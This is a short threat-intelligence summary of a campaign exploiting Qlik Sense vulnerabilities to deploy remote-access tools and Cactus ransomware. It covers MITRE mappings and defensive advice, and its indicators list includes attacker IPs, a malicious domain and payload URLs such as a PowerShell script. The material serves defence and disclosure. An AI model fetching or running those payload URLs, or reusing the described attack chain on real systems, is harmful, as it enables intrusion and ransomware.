Threat Research

Qlik Sense Exploitation

Securonix

Threat actors are exploiting unpatched Qlik Sense vulnerabilities to gain initial access into internet-facing deployments, targeting CVE-2023-41265, CVE-2023-41266, and CVE-2023-48365. Post-exploitation, they deploy and proxy tools like ManageEngine, AnyDesk, and PuTTY, use PowerShell for downloads, and aim to deploy the Cactus ransomware via a double-extortion approach. #QlikSense #CactusRansomware #PuTTY #AnyDesk #ManageEngine #CVE-2023-41265 #CVE-2023-41266 #CVE-2023-48365

Keypoints

  • Threat actors exploited Qlik Sense vulnerabilities CVE-2023-41265, CVE-2023-41266, and CVE-2023-48365 to gain initial access.
  • Post-exploitation included delivering RMM tools (ManageEngine, AnyDesk) and attempting PuTTY delivery to enable remote access and potential data theft.
  • The activity is linked to a campaign associated with deploying the Cactus ransomware via double extortion (data exfiltration before encryption).
  • PowerShell commands were observed to download additional tools, indicating ongoing tool deployment and control.
  • Malicious downloads and use of PuTTY suggest attempts at persistence, remote execution, and data theft.
  • Defensive actions include patching Qlik Sense, reducing internet exposure, deploying endpoints, auditing RMM tools, maintaining offline backups, and blocking known malicious IPs.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Exploitation of vulnerabilities in Qlik Sense to gain initial access into victim organizations. “exploitation of vulnerabilities in Qlik Sense to gain initial access into victim organizations.”
  • [T1059.001] PowerShell – PowerShell commands attempting to download additional tools onto the victim asset. “PowerShell commands attempting to download additional tools onto the victim asset.”
  • [T1105] Ingress Tool Transfer – Delivery of multiple Remote Monitoring and Management (RMM) tools including ManageEngine and AnyDesk, as well as attempted delivery of the terminal emulation tool PuTTY. “delivery of multiple Remote Monitoring and Management (RMM) tools including ManageEngine and AnyDesk, as well as attempted delivery of the terminal emulation tool PuTTY.”
  • [T1021] Remote Services – RMM tools would be used to enable persistent remote access to victim assets. “The RMM tools would be used to enable persistent remote access to victim assets.”
  • [T1041] Exfiltration – Data is exfiltrated prior to ransomware deployment as part of double extortion. “the double extortion technique, where data is exfiltrated prior to ransomware deployment.”
  • [T1486] Data Encrypted for Impact – Deployment of the Cactus ransomware. “deployment of the Cactus ransomware.”

Indicators of Compromise

  • [IP Address] – 94.156.71.115 and 144.172.122.30 observed as sources/destinations in the campaign (example IPs from IoCs).
  • [URL] – http://94.156.71.115/instal1.ps1, http://144.172.122.30/Qlik_sense_enterprise.zip, and 5 more items.
  • [Domain] – zohoservice.net observed as a hosting domain for PuTTY-related activity.

Read more: https://www.esentire.com/security-advisories/qlik-sense-exploitation

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint